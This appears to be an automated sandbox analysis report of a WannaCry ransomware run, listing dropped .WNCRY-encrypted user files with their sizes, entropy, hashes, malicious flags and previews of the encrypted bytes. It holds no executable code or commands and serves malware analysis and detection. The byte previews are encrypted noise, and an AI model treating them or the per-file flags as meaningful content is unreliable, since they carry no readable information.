Preview:	WANACRY!.....C1.% .%.A....Y.n&S(.....?w7c.......c.Ev..M.Z........rx..1.m.sY0.....E.;b.......<.'I0:..&u...#Z....1..G@@...<.5z...9a.{..@..Z.z....n..<....8...9}....../6./........N........."t6....c<x9.wX.&>y........FMt"(o.9d@.....2..].1[..p...u.SR.,G.0.z.{...6`.............R.s.@..4........E.v.{..:....r;..E.710"..g._..=f2^.a..#.[%C./.hf....t......X..~5...>t#...h3...(.......l=`...Q{..u.......0.>.;.KDS...3.......M.FS.>.....2}H...&..#........{m.....ELeD.K.D...+Fv../R.T.tM.!..W..).5j.......p...0#d.>..S.4b7.~.~.:...e.S/...z.]5..;a...4$A...p.=8....f.'.>~Qh.^..;D/N/..u..=.....<..j...V..sJ...D.4G.m...t...u...p.R.S.e.y...w-3c..1..X.Z>w..(V......ug....l.I./.V....7.z..N.m.'n..?C\E{...<d.....w..7...4_....`mKkO3..X6...~..7....%.....c...Z..._a....r!._.$.\|..!.m.1.).y^9.h..Q....l....ul..V...sV.T;.jn....L...d:..'M.!.......U.6S.T&Be\|..x..9K.s....N.`...>i+$v.QR..H..:?$....n.d.a^l...0.)f..ADl<...-............Z....RY....u[S.t==.. .A...<T.'...T.B.LM...h@.t.

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\OVWVVIANZH.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.842333278352295
Encrypted:	false
SSDEEP:	24:bksJ74NybLmUCTM7hnLmIHrmQVRqaCZjZSF5FAv5U7jAhZwih9y3Q8mJxrgZc:bksN4N0mtE5CaVRSSX3MhT9oQ8uNga
MD5:	78A2F1F437AD1FD387DAA74AE0DD0749
SHA1:	5B244969A90B11C378DD2509428B57C90B049A4D
SHA-256:	F9C1BC65851F96AF3CE970619286BAE3F7502F50B58B80B02E816451457B3C24
SHA-512:	EBBE5FD6076004E8309E4D803BAE561CAA1516672456BBCB75EB06237E8DDA2D672B772839CCB1856A93E854B5EC23D697E5960B8F6532B1A0702AD842D8BC98
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....d...D]?9.."..v.s.P....8:$..,.Z!;.......(.j.vo%x..]..,.!.....`.!..&....O...`..EC....N.rK.+.....ij... ......c....]...".z.`.G.#..]A....I#.{ ..?..+..X.n.}t:.;.:......~.e.3`.......8...b!..=^..#.......b.....Nc..mb.....U...O....9z...S....F.....................v......[/f.W.>.k.N.x&.".tN.......U...{.?.u.\|<.,.C.VO.m1k@.h..A..5?......1....U^...s....aOh..}..T[..=........O..\....4..E..?..g..P..Um...V.sz.4O8!.e.?^.~b...........12.(....h0.}....j....7..x.\.5.Kqm.......MC...Z..R^'..`...........'.B s.........K=.q..=T!....d...gk..W.k.m.t....t'}NO@Mk._.(....5.,....V.%..M%`.........J..F..g.0.%...He.\|..Z.1.q.IWNG......r.z..9..n.....Z.U.E......e.....I1{...:K+...W{.n.D....DU.9...54._I........~..R...n......C.....P..5.@..l..^.....V.-...n.u.r..C.8....?.9..B../$.&F.z-...5...y'...XQ...H.......J....0F[....b'{.....`F.*.y.M.i.. .?[....!.. . .rN\|..V...4.K.iWmXA..c%=.$..%J..b,....A........<w..#..6_/......4...1u..S~:..5..lC0..}...>...Q..<.n..cX[>

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.852790990325407
Encrypted:	false
SSDEEP:	24:bkyGmKv3kWui3VMXvHxsrZGrpmUlDUz7ErDods8/pBPbfgMjcu0zQJO5QHHp4CvL:bkyG3fkQMXvH7pmF/sDoFBTf5jPkkO5k
MD5:	68D3849081284A32E730B321D18B5FDF
SHA1:	558027D7E04643FA553839F4B7A1909D7CB25275
SHA-256:	D46BFADC27161D69A545E7965E37AA8C282495816CE6C1A36C3560F589342C6C
SHA-512:	29AD8E9541AAA9DF69F87215A6081CF41B6963722CCE91632EB580B53E81A85AC442B288FEEF4043A3844166DACBF695D2D6EF9CC0E78F9C61E2B6146DFC1D10
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......XI.w.u.=...<.R....T.J..&..$..0..2.0.......K........5!.WbB.L......a.u/^7../.&VF...R...(.c.Ig.7....#...{.3... ...T;.U..rh>U....I.6U2.^....q.........q....eqr@}..D?....p/R.tX..{/ZF.w..."..4.....'.@X.pe.U..a......P.....1.-....&.....R....f.\..M.t............CZ\|.hr%f$....M..:....MW.)+.q.R.......4...=..X.T....}....ja0@..;.SY.<%...C.h.3S.&TT.."~H.p..t.A.0{.y...;..-.#.{J......T...7U...T-.....C..V....GQ>...>...m.d....CWO=...,.`qp.,...D..D$.t ....J.h.:.qT..^4!..O ^y....\...C...g.=.Y..%........<..%r~[=..~6.......(.mH?B....Y.}..Y...%..C..>..\|.f}K..6m-..:..o.....J..<v-.[.\|.......:.....l.....\|.3.<..x]....5...^.y&e..3......\| .....b.B....Qu...X.-.l&<..<'`.z.-_k..../~w$....b..:M.....x.mW..n.UM.[.'W@..B.n(BFh.."..W;@...f.\..@.:._.Pz..+$r.[.....rS......g.K...O.GWe5).c...}..#=y..:.5...".i..?/.(rm6'.....y.g..F.2A.x..i.......a9.w).*&.7.WP.>fd1J...62.>"ta..{.a'\..Y^A......So;.c..~M...~.....+(+...A.....!X...X.l..B..G.T...........^G3.....T.R.wm.E...

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\TQDFJHPUIU.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8504912972354735
Encrypted:	false
SSDEEP:	24:bkyI+hcdrIVFvklPlEFbbDokk0SjSi5jxfG9+lv7MOu0BzOVjqjgyBgFLDwAe:bkylcd8bMlNkbpm9G9+5MXjOBw0P
MD5:	EDABB566A53E0BEAB75E8FC914C7243C
SHA1:	F0449988D1A0F7EEA07A440A9784EF19007C6A89
SHA-256:	D352EF338EE8D70E8FFD6B63FF3E9E3D64707A179B7944E47AF07E5CAE5A6797
SHA-512:	B72D9DA168720C09AF932550368D69D6BBCB6CCD488523B0B5B0B22906657D066C1BF55DE050134C7008700AB6673ADA50F17EA6166F45E67D14E462509A4D57
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....4...2..t.?(....nOoI{..........,..r... .".....e.^.`~...5..5..[..>....7.............-.^.......Vt'..0/wb.W.I#1...r.3@....:."8.:.a..bd....(..}...F..E..C..._.... .vRL..W.s.g.eg.n........G...S..7~...$...?..@.....bDt.N,..=.a9.@5..M........F..U.=..............l....!...SZ.Af....\.).&R.c{{J#.z.B^..$...@Bt>.v...!.9...XI...r.......JM..(.".Fw61.:...zYaT...1..7....YP..Y..H.6.....nZ.....][......1...........\|......'>..^bE..2.A}"...........PJ.B.y2.2.@..D.?...T.0.y...jf........._.s..5@W.:N......S...Q..4.^..8...+........s...!.......<..C.~Ga.#8..}r.$..\....h....L./kr.....W.6.I."o.y....h0.e.P.=X...x..Q....U[.O.r,..UT.&zv....A.m.. .!.o..L../.[.....Y.k.w=..f..^.7N.6..d<a.>..B}.i.D..x\.......xSZo.m.P...u....y.ur.x?.@.,=.F)1.U..;5.9.H@..B.I.0.yb.........!J.G...c..N\|...L..c....}.f~.S.9.O.8.U?B.......OS.E.....[<C......`.6.\|D.....B-a..k.z.I..S.MD=...l.x.....;.uA.e.m5..e..}II.i........4.....*..xO....4.[8..<.%;........nB.....\.I.3....[."W................x3

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\TQDFJHPUIU.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.860005240959193
Encrypted:	false
SSDEEP:	24:bkn4OpqboNAqhiZEdzhKChjJe2uazPnKuHRzN4KBgSWySS:bk9qbU02dzhhVzuaLRHNN4KBg1LS
MD5:	2FD9D65C491FC37289E11045454960C4
SHA1:	35C7D6E98A254C4755926695416D5D0D02167275
SHA-256:	94F7650A123CE1652EEA914BFF9790F2D4B20C07A2EB34B1BABEAF04C44BC268
SHA-512:	E7A37146554B10ED35158C5DA00B2883A472E4E028BCF33BA054ADEFD3127239AB648B986FB1B03F582139648B27D72CF91124D1E782076E585FAE7CD0AA6F66
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...... ..z._lkz..I....E...Y..Y...[..q..............QY6gwm+.aBb......M....D.2k...+.=....W.E."..u.enD..9D..f.0.....f.[.....U.%....?..../x.Z]"...y........[.O.>..,.....R......d,....f@.....0v..!b<.L\|..u....6E...E,E..c........9.^.#.)ma.......:.............n..TU...\.<\.....0B.@.3...8.7B..5&.....K.l..U2T....-y.A..._.#.Jt.+..2j.{.```...`.fo]......G'..tl....n}3),...o.U.7...../.....G~....~...e=.&7.P.....Z]v..e....4.i3....v.)...I:f`..)..#..Q......%A...j.jr;T..0#..5a..!...rA....].......r.{.o.u....cxX.......w...\v....Kv.,40A/........u.K.jS.w.g...~.<..\....u..85_9.....<.Ztu0H-W.8.,......3{tb....g....n#Dtxn..U.RK...\|.[9..........%...#>=[jR..8.....i.?...S...F#O}...dWRS.....4.2w8E.....p..>/.!..n.....5%.s....Z...[.....>S...`...v.q..[_f84.4A..k.....v?..\....."f.`.......`.K...L?.....4B).....#.(.P`v.....G...5y..p.^M.gD7...<q.../..w/r..El....b*].@....../..........XO...q.LWoj..}.0..14..&1....f..{/..Q.^....#...9..N..}..Tx ...K..}$W.CC...x.....;q...

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\WSHEJMDVQC.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.836228816038545
Encrypted:	false
SSDEEP:	24:bk0GbGU9Gd8mblQwJBx32rpJgZI25HMG63ftBiIkd4hQb1Lkx+pS/SW9AvLXx:bk/V968mbJWV61lMGifZApRwx+pwSWG1
MD5:	E97D698E8995CC57F4B13B7A568F6B9B
SHA1:	B0208C7A06988F95FE54DED5F538FCB3D5D7598B
SHA-256:	3C973784D6BAEB79977CB8AFD230BC8789C228B278EC1FD187FF6D900A4B7163
SHA-512:	49C37C658B9FA28B0116557BB70D776BFEE4F19B31BE2533FF4F15AFD349E669FADF21F9F972C360318BD81394DFE232998B9CDF3E979E1948BF914200A0F784
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....;....Z.6G...nX."..:.Z.?...>...T..ZC...i..h.65....3.U.......Q....d".^.z.l.JK.....f......kX....\|.X..K.o6.7.....u...6.....P..Lx.P/t..z....Q..ve.. .`..R.......n..D...~.......EJ.....8^`.].c.7........[.....N.f........]fv..9..{............He.njg0-pw.x.].............y..cN.F.z....h..Q.%...}.../....l..gw75I.V.+Xc.]....._.p.c,.Z..e=. ...%..U._..ga.H....0bM.s.H.....b.r...Sj.`...+.e......loff..n. ....ujM_......5..C#.....<.;..s.K...0..1.O.#$...........}..h.X.>.iY.h..Xsz..7Z..,.S......h..[xx....y"..M...K.+.......7U%.d.}.2.../Q..=p..s:,...gA.pS....HU&!B..\|y.o..W.......K..%.+Y....E..0'...U...6...Y....o/3...X?og.fqiB.xb..+a.E...}..$lc....s.2.(....\|5%..K.>!...2:a=%.?.&..d-Z?....[....6+...z...3.....<.....C..........5'.....H.i.T..X.+...^Gx.t...[.....WN.....[.&v/.~.'C.....Q..Vy.Ts.qBLv......w....A"i...}.K.......@..e}..0...}..D.3V...{.b..1a...c..2.x...$.........e..A....(tQ........6...y.9.q.......J..0...VF....k...A_..nO.....>3qI.=J....W..=s..j:yMN..pE.6..

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\WSHEJMDVQC.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.840411662321956
Encrypted:	false
SSDEEP:	24:bkuyPq2nQr1/GMkYts0x8VZ3VJPpApb0QE1cbX4p458tGSyYTn0gj5AnDVnfQt:bkrxQBOPYoZhou1fke3yYwy5AnDVnfQt
MD5:	D37483B10DCFC217F7BD697FFA124303
SHA1:	BED5FA6F16BCA2AF2D9212AB9F142B9C17F4DBB9
SHA-256:	BAAAE42522AD0BAB4342B94353C2A435163C38DA87A70243E3B42A80B91C37A0
SHA-512:	4BF182B99A15D692C93861BEC586D8731D23040F93CB928AA746E1BC313EBE7A2BFF4B692C7CD4AD9C7CD282D3004A53B4DEB7213DBB436526AD368693CEC19D
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........N...R..3N4I.X.@uh.......,L.Q.)[.(...}.i...M......03..j.fs.1..\9.....U,..CfdX.X...?..2.:.<...{..q........$..n.+u...~..@.....s..3.uS....?...Yf{.0..a......U...2.mk..........O....w.,.,!..A........w.."..M.h.-....!.<..k....`z........{.............../..c....[..[.34..`.......h..K..`R.d9@......(.z%.k.8.W.........jcK0....x.....p....x(.?L.<..\|.q..4.{6....;.Hr.a........./.......s.t9YI....P...p8.(..;..d..].+......J/..=.k.3.. -..../.:.t.Z..k..........T.\+.AYw......^....P..F>.s.6n..].z..fu.v........e.Z.0u.6...u.IF.u........%.H..F...9..b{...A..>EP RQ4.7.e...t..L.UW.....]okq.{...k......S.(..../r7.b........4R._....-..E...($..g.%..q.O..SV.1e+.n..<...I9,.....S.W..Io.....N....0h1....w..ab...A..G?.xN\|..5. .........K.1.)........+]....)....`..@....Yo.vdl.r.Z.e..n&^.RJhX...... k.....0...z.t>]f..h.~...-_.Q'..2n@...Q.[u.......eu\|..:...A...R.M.;..<.....q...\|.f.s.c..4...q_..C.$Z.7..^P5N5-..... .......7m...."Z....\|b.....Q....Hs.X.....l..

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.863386364451782
Encrypted:	false
SSDEEP:	24:bkjgVzI0TR7Go8n3eu4QYNx8tFWvszWmtX7xzyCBJM+SkwE7HY:bkSMK7GoQz4QYNutGsfrxOCBJbSk9HY
MD5:	6BD3139FCE80F338E7EA81AF40F88DA9
SHA1:	E2BD8544452C983682B879D83418E6852AB80646
SHA-256:	08297903D04DF49566FDB24903E7E1D17977CD97F28A208EE5065368D62982C5
SHA-512:	30D8125026D11F9CB73D43DB5F97F6F7BB72A2C9274A343622A985361FB8EA262775A28867A88D63A9C8FDF1CA0704FF0E331E6F8E6688568C8AA7E5CE862689
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....1`..2+..../....}.k,..X..D...v.9..AC)w.w.F.....L1t..J...e..C.(.D..Lvv...,.....f.($+..t&.;..7......l..x/."`M.'.?K..`d.......6v......d.rQ...{..;V&MAu"WC...ETd...#..I..`.0.YR,S.L..$....sE..&.....y^....B7..T@..L.<.......C........e.4.5..6.P..:...9..............R.PjV....N.D.-.....~.{...t!.9Y5S.8lLs&..\|.[u.h........._.....B_....N..<...'....\.\(...%V..;{..u.Z@......a..ga..9.......<.......@...4@....m..E....+..$3T..e.c.,.3......%.T}U/....@#......[.I.`....f..'.e..V.....0r.......y.M....)...(..R....w.6".........`../...+g$........k.] .W.>x..Vt.4.._J..C.F..........>.8k.iL...L./....2o=..EC....h.....Jj......wO.5.b..D.p..#,......]i.!.....Og.......D$.-......x.B.{X}.mx.m#......%....0...-...h..-..5.BX....d.8.....@.......D.6~..lJ..Ym.H.v...iC[..0...UO!.-.-.@.}1x0...4sq.R..n.k..g2%.R}.u]..7.B.q."Y..W..n.W...a7x.YF.g.IP..R.Xl.g..... H....LO....P..>4...".fJ..n....Ij...1nc...6..'8.N...(D..Tt...e...=...z..'1..![J?LV.,lt...Q!....]T7....:hI.!\|..#I...

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	40984
Entropy (8bit):	7.995449754184206
Encrypted:	true
SSDEEP:	768:6IcFA4ymDDvapmhhb7O7AtXiYv2sIuPNOD3f7P1AAJTuCNtNeuc:WW4yNpwlOw/+sIvra8u+tNer
MD5:	82338F1E053EE06C72DE147E8D5E468B
SHA1:	7D2B01667D4393DE094F4A988B8A35A5F67E0F75
SHA-256:	A3594F9C93D045F99FD35DE8C491C63D079CF4CD86CBC2354652B5EA43E0EA5D
SHA-512:	53436DD3E7D7E3AA2448A6936843AF7CD0D094AE8E4157DD38278232F8800907DBD033009951EC6F4E08FC371471BE34587AC925E265DE9DC98774E6793EACC3
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....^.$.u..f.hZ..Bx2......7..r.k.R....'F......v.r...%..H..._..=.I(h.0@..Mx ..N.b..x.........4.I.a....A...!...8?.X..Y...~.a[.S.<.E....T.b....@w..%u(...G.yr...S.'....z....`..(:.9.}...y....-4...T$......^........fi1......e...lSCi...dO.U..<+QG...............?..Qr<...]{...x.....V#...'..R.\|..4k.......>.[.\|.&..1.0Q....2....j.H..b.u....J..lF..8.}...`....V.<.bb.5...L+.Z...U.1F.J...\|+TmYa).+..nw..e...!.&.!18.}...n..'B.s.......S..w.....M.))8U.....`.>Fia....z.E.R`0v...9jc...)q.D.a...xH......}.n.T..r..`.u.!.ZZ.]}Q..l..$0.TB.f...+.qR%......yR.++j...;..&H..bl...............5#.....K$".I'.&.%...58..7.,w.0t./..qa.:n3...[....".Oa%.h.qLnp...AV.....$N....~..U.[...p......Jk.4...H...%@...5.6;B_...wF....'.]..@J..@.]..."..g.BV.uJ..]...Zo.....j..Si\H..b.........:..dK..x.jq.@.@....Ui.~&P...S"...,...k....G..".b......S........+E=4....j....z...',......S..Y.`. ..o..[P..AT.&..L.l6.Z.L)..:...7.'....T..S.b?.2.........8....w[]...\qy..3<H..1.<..MA.p

C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	125288
Entropy (8bit):	7.998543968126807
Encrypted:	true
SSDEEP:	3072:aiHgFQoZhCCkHWcwq7/0Tb/H63O21ItWbe:aiHsQEzcwqbKb/H6351ItWC
MD5:	67FC7328B83B7707321BEFF7F9C8BC1D
SHA1:	B78896C42D73418077862657B21669265CD2745C
SHA-256:	F3F334038379718E305195A9BD3D1C4F575B928E12FA621E73B77170D1AB8599
SHA-512:	D2ADC80DAF311B4DEB5692F7305D68CA93C5BC24DB14783634A819AC2668C0B7DF701A0CBAAA0B7C85F4319B8F36A8E4EB25D8EC991D29E4AA3CDD66F31067F6
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....}j...v.V.h......%.X.(..ox.2....'.........)....q.P$kCF.k...._YUa}...f.H..'8..]..1.....Q.VS.y .....j...[e..."....w.N.U..L.0.....vJ..k...q.+....^...h......i.....Nt.Q.`..I.T...C..y.SA....EtX..rA=...h.w.^.9....v....oW$......+...q..u.t.n.sI^.........D........b.].}.....t9.c..w....N..=.B...i..\..B0..[...).O}X>.-.pT..qf...h.D[.#I.y....5b..Q.'..zi.....E!{...0$..I.....K...o. ..l....5R.....Fm_._.{`.2Zo}..e.eh.0..........W....g.d3Uh7.... \|j]..h.~......\..S....4..c.%.H.#.....[..Q..g....3......>...Iv.:h..$......4....u....E...'E;V....l7...ip]Q....B~.k.\|....TL..H.&..m...l..)e..i_...._D.7....:R...b.u.R.f......g~..J.....p.h.\|..D4I.Z&..o...'........XI...3.e+\|..kI.m...B.3....).B!.t!......h.z.0....8.\P.K...G)p..:Q...y...J.........u.........so."..K...-..G$.:gO..8.8{?.8.t....G.G.0G'.E.....h..I.)xw....%m..Z.-.N...+J.<...-e..C...4z..~.}.4.....h...........O....H.+*...i.XX..`{#.m......~....e.[..&.g..8.gM...0.... .k..46..C..4f.&.fO3.i....R..1....G%

C:\Documents and Settings\user\Downloads\EWZCVGNOWT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.833630189351209
Encrypted:	false
SSDEEP:	24:bkoxaxQGvSkmLIy0kt1T71WlUvGkzKK4Kgv6DYD0gfFcWgLYVmE6DmTAE1ngdUAA:bkoxaxZv00Wh1W6+0KnK4r0ECWAYVmFe
MD5:	6546E4D91E9189BC7BE982844E773201
SHA1:	183DFCEE38A8EBCB36A6BDB7DD9C4AAC634F285F
SHA-256:	C1BC688F33E069606DCB7C14D4F1721DB40C7D6295135AB51D9C9066F13A1E09
SHA-512:	D3B7761255BFEDAEF3D5B5A7E7E962365B68C937F7866CA9CF85EDC2F9C5996AAA983777E4D830C2DF7FC30A13031A882B8DFA8DA2CB7330582F7430BD1559DF
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Z.;....1.q..`g.....\.o{o3.pBk.......d.7.>......1.D..%..L.in6...ggm......F5'.u..K=..wL...C.Gx_a.9cL...{....o%F`..J7..4.....212..Oe.>....u7.....0@.....R.....).x...#..Wu.....-..w..^C..~.'9....M..Z&...Xn...Z'.q0G._..S.K.......o......L."&^.\I..h............f.8E.].[.C....z.......o.....[^_.jK.Pmr.k..C.i..>....2......}z.XSm.xb<..........r...Pv.......[[G8...K.s...UMr.I.4.&!.g..d.m....s.QQ.P...}.=\....PWZ..#...j.D.. .Is.g.M.V....%.F.H..MO...-.`............#..JX.~......K.....+7.2.z.1...r..t...7.-...1u..f=9l..}F.d0.fr..,..oy.Ix.Cv3......vy.X.%(M..Hs-.ZT..8...\%2yG_.".Sq..g\x.F..ag.....M..}...f.[.i\|..C..Be .%.a..D]z.s..C..M..i..<w=.u..D.....(..>ow/.';o.VT........?Rz....p.;.B...0R.....]..,. &....Zg}..............>...Q..b.....[....=....R...I40.%E>.u....t..5.b.u...2.6...]cl.G...z....i..>n..#...1e.#)Ox...V\,..I..$.jz.s....`(..7:\|KZf.......u...M7Ki.\.hR...W.)V...V......].~]u!a...R..".)......./..*.Z..:y9..89..P.....[E..8[.....A)e.Z

C:\Documents and Settings\user\Downloads\GIGIYTFFYT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.85497523997455
Encrypted:	false
SSDEEP:	24:bkGVuPMP72vANSXJOTLnmrnlleONJmrHTGltO6tTmWIfKQ/WrwpGv1:bkGVZYAsZqLmrlleuJmrHgOuTmJKQ/te
MD5:	5AF2F19C6D5C47EF057F0B32316E14BA
SHA1:	5C9279FF07AE8677E668977FC830BB2D6BB219C9
SHA-256:	903D91F7BD9EC8879C86B5E4E4333762AB0242628DE181D7BE13EEC701E52453
SHA-512:	DD9404B4245AA3A0317B959C39774CF2EB1DF9B9DD81AA8D47CCF80673B1DA10FCB22373FAECE4AE79BDA1AA1E2C1BC3FFB9884E84FA34395D6CE95B2C3DBFC3
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....(].O.x3.Z.........m}....f.A..%.'b....r.G.k..U.<.ND..a..C]...:C..}.....Hj....{.. .f../[E.:..\.Y...be.Y...U.}pD]..Q...B0.'N.F .(..........x8)...)4.H.'............p.......P..sn.K.Af)W.Y.I.#k..Q'..G.q.t......F.kin...E.{[8.M...%..:.D..-..U:............Y.f(...a..._...X.\20...".6..f..6y.+....Z.v3j..;\.....s.]...Uk{.^i3......Li4..J..&H.....l...>.z~......Y.1vK.(k......2.j..r^>\X.).J....3X..5EC.#}.IY.9'.M ?.....L.....i0vd....m.~'.y.T..^>A.[w..^.Z.XO..T....l..U.........V.C.....~..e..v.b...))..B?'..;..7..{`...D@]o....`f.(.....9..K.r..m[........Z}.5...P.............BN.9......6.#.d.P ..d.a......M.l..O...G.R...5.0C.dW.qa...U.?.$?o.~\;YxiG.O2..F...,...,.....,..%..'..S.e..E.qb.Z..F1..b...>....sR.i.5...k}..6.=JW..[.<...,R..E.3;..]w5x...$...am..f...mw._....E..OM=.n...31..>..9x..sa.p.i._.=y..3)..)....=..c..]...a/.1k..$.9..G.Z.... ..."..6. .uKx....z..}=1........t.......I{......P..io..a8...2c.6......g. =?...... .....U..p..6.^.<.5

C:\Documents and Settings\user\Downloads\GIGIYTFFYT.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.856363829056131
Encrypted:	false
SSDEEP:	24:bkVGz3gu4DJUUoR88MO2X2CR+SfJd9TOW6NIO7R23DImvPcazrD2W/6WV:bk+kS/MvXPfBOW62O7R23DaazrDp6WV
MD5:	C63FFB1F0D715D06850F3CCFB0E30649
SHA1:	C5207625C7972A7013CDEF9194AD4EC83E9F582E
SHA-256:	C24C998692908909D514BCDDEC66B4B5A87F529364CBD90D22A1651F7AA23685
SHA-512:	ABF2B48D4732A9A05A007021C648639157628878C6657EF3EBDB654E394B52B21ACB8CF9BA9D7A803B22A0DF7831752FC28F859CFC38EEFA145E718EAE4CEE27
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....`..<I'.Pn...h...B..&.....(E7.u...b...:.X.v.z<G......dvhX................&.xOJ=Mc.@....3...e........CO..`....jU.../[iw.......&0zDu....X...3...r..m..r....a. ...6.M...".T..c....C..6!....q..Y>k.D.S....w........pk.._5..4}h.$....!j..d>'e....n,P..S..............g..a.. .........m..o.'...@..,5.7.u.$......k..bx.o.X...5....9..+..l..S....\|....;.a.T.'.s.1..W..F.L`).%K.Q:.6....u.......d.c.)..L.,Yj.6.b.PsGt.&....4.. .......K...........H..:vj.....U......m..Y...u...A9.......~..t....a..\...o....-...^.T....L..h..:...z......#....45Z..V...%~..-.?...-....W.{.+...XQ.$6.N2.Y&....p...bg.. .........?.S.Qf.....w)O.^~\|.+.,...7.....B....4[.k=....: ^..a..dE.2.3.9 .v.x[...4.8.....2.2.JJh.Q..p~..l...t.A.lE.....I.b8....... ..w...u..M..:W..e.92.........'.0....T.9<\|.^.0.z5_P.......N...6'D..d....<..E...6.a.......y.kG..%...1-:e...r.^[.$..s9x.l\|/..Bu..-./...[X.+..t:.h..\.....vC%....,.kkF.f.@0'..'..W....Y....8.._....otu..i.....S7q\.....A..-\|UJ.D.......j.(%

C:\Documents and Settings\user\Downloads\KLIZUSIQEN.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.830905604842412
Encrypted:	false
SSDEEP:	24:bkEpRAUiByc7DgxUs6wiCV1LnW5Ak34aRWn52hA76IcDBj:bkqRAUiByAcisDu5Ak32SCABj
MD5:	FE92E5F24ADD7F2024A7EA8F8995F77E
SHA1:	568CF444D78617F23F5674774C719E02A82A7E94
SHA-256:	B21F476778D37824A46C28D24BB168BB52EAF0BF2ACAAF924E8EC9293232DBBD
SHA-512:	31903D34DC9102E2B2C117B84CD8FB2ACE3AA1370D9CCFF185B86735FC9026CB9EE27098144DC88E26992479EFFDCC5D876EA9FB589E7F138484E09010413FAA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......\...R...>N..A.....c..u..C..J~3.3F.s.e;0.Y..IE....\|-l.b....>...r.;T...w..&.=Bx.%....Q7Z.+.wN..le....@.....e.Y...".a0$..0.T..V.)J....o..Z....S. '...nxS.t..A........X.h..........5..7h...'..Q.........o........6....G..$.3..d.$$f...k...`.#5.E....................".C.\|...O^.....f.p..D....t...).XdL......H.....I..B..n.`...X....#..0.W.....W..D.e..^..E...._V>..Y).zU..:...b......3...QD........x"v .........P...C.y.n.......#.......M..D..=.5h%..6.,.!F#.E_}.c.r.f.QtU...lR.Sc.q{v)U..!{6.'.m.M.5_.{...q'<...h..ruc.9......&.j...Q* r....`.OR.c.Q....!......?....w8J..8.E.W.h../#.].`.`..o. !b..[<.D?..8R.h....T....#.7......`}..OG.T>)>..R.G.o<..al..T.F.M5K$s.u..!..K.......lq.`H.FXm-....~C...E&^M.B.2.0l.F.....$.....Z'.w.....V.5H.;d........E3sp...P.\|J......Y..]J..m.[pAd.d..x........f..'....-......z....$..imx......d.y..m....;..q.e...c..;>g..&..?9]R..}G........:a.Q.!%...%...#....H.:6.e.D...~.kq9c..PM......f...g.$..ayG......S%\|.*......7_.Y.../...&&..t..

C:\Documents and Settings\user\Downloads\QCOILOQIKC.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.81210777788863
Encrypted:	false
SSDEEP:	24:bkSbAHbbvRPU8FCk1BpGQAn8GoJptFKeNSrHtflppsXqZ444icbrzLyb:bkSk7DCCTGQy47ENfRsaGPicbPU
MD5:	60E6898B6C7E8C3ECBD203AAC784D166
SHA1:	015EF5F87FB10AE4967F46E7297A3B3EC17943A5
SHA-256:	6AF7D19E7EC0FC5E71F0A91396A1AB4F39BE9AA10A75C81A75CA8E84E96105E7
SHA-512:	A91BD17EF729E8A745B19011331DB47520302EC7C3ADE3B3EE55539FCA826525ADD3B1FEE99FA44E565F48577789222F633D8929091D3ED81FC2856F57C744D8
Malicious:	false
Reputation:	unknown
